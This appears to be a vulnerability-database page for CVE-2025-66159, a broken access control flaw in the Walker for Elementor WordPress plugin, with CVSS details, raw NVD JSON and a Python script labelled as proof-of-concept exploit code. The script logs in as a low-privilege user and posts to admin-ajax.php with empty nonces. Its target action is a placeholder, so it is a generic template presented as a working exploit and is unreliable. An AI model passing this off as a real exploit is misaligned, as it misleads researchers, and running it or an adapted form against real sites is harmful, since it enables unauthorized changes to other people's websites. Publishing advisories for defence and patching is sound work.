Security Vulnerability Report
中文
CVE-2025-66159 CVSS 5.4 MEDIUM

CVE-2025-66159

Published: 2025-12-31 17:15:51
Last Modified: 2026-04-23 15:35:29

Description

Missing Authorization vulnerability in merkulove Walker for Elementor walker-elementor allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Walker for Elementor: from n/a through <= 1.1.6.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Walker for Elementor <= 1.1.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-66159 PoC - Walker for Elementor Missing Authorization # This PoC demonstrates how a low-privilege user can exploit the broken access control import requests import sys from bs4 import BeautifulSoup # Configuration target_url = "http://target-wordpress-site.com" username = "attacker_account" password = "password123" def get_nonce_and_cookies(session, login_url): """Obtain login nonce and cookies""" response = session.get(login_url) soup = BeautifulSoup(response.text, 'html.parser') nonce = soup.find('input', {'id': 'wpnonce'}) if nonce: return nonce['value'], dict(session.cookies) return None, dict(session.cookies) def exploit_missing_authorization(target_url, username, password): """Exploit CVE-2025-66159 - Missing Authorization vulnerability""" session = requests.Session() # Step 1: Login as low-privilege user login_url = f"{target_url}/wp-login.php" login_data = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'redirect_to': f"{target_url}/wp-admin/" } login_response = session.post(login_url, data=login_data) if 'wordpress_logged_in' not in session.cookies: print("[-] Login failed") return False print("[+] Successfully logged in as low-privilege user") # Step 2: Identify vulnerable AJAX endpoint # The plugin's AJAX handlers are accessible without proper authorization ajax_url = f"{target_url}/wp-admin/admin-ajax.php" # Step 3: Send malicious request exploiting broken access control # Adjust the action and parameters based on specific vulnerable function exploit_data = { 'action': 'walker_elementor_vulnerable_action', # Specific action varies 'nonce': '', # May not be required due to missing check '_wpnonce': '', # Additional parameters for exploitation } exploit_response = session.post(ajax_url, data=exploit_data) if exploit_response.status_code == 200: print("[+] Exploit request sent successfully") print(f"[*] Response: {exploit_response.text[:500]}") return True else: print(f"[-] Exploit failed with status code: {exploit_response.status_code}") return False if __name__ == "__main__": print("CVE-2025-66159 - Walker for Elementor Missing Authorization PoC") print("=" * 60) exploit_missing_authorization(target_url, username, password)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-66159", "sourceIdentifier": "[email protected]", "published": "2025-12-31T17:15:50.583", "lastModified": "2026-04-23T15:35:29.193", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in merkulove Walker for Elementor walker-elementor allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Walker for Elementor: from n/a through <= 1.1.6."}, {"lang": "es", "value": "Vulnerabilidad por falta de autorización en merkulove Walker para Elementor permite la explotación de niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a Walker para Elementor: desde n/a hasta 1.1.6."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/walker-elementor/vulnerability/wordpress-walker-for-elementor-plugin-1-1-6-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}